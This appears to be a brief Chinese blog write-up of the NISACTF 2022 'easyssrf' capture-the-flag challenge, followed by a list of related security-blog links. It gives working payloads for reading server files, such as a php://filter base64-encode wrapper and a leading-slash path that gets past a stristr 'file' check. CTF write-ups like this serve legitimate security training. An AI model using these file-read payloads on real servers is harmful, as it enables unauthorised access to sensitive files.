[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
Suckerbin44 分钟前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全
房屋安全鉴定检测4 小时前
房屋安全鉴定注意事项
安全·网络安全
房屋安全鉴定检测4 小时前
房屋安全鉴定机构服务内容
安全·网络安全
晓衣9 小时前
2025“獬豸杯”全国电子数据取证竞赛-k8s服务器取证wp
服务器·经验分享·程序人生·网络安全·容器·kubernetes·学习方法
lingggggaaaa17 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
诗人不说梦^21 小时前
[CISCN2019 总决赛 Day2 Web1]Easyweb
web·ctf
jieyu11191 天前
内网后渗透攻击--linux系统(权限维持)
网络安全·内网渗透
Suckerbin1 天前
Basic Pentesting: 1靶场渗透
笔记·安全·web安全·网络安全
qingtian!1 天前
matrix-breakout-2-morpheus靶机渗透
网络安全·渗透测试·靶机复现
小韩博1 天前
Windows权限提升(二)
windows·网络安全·github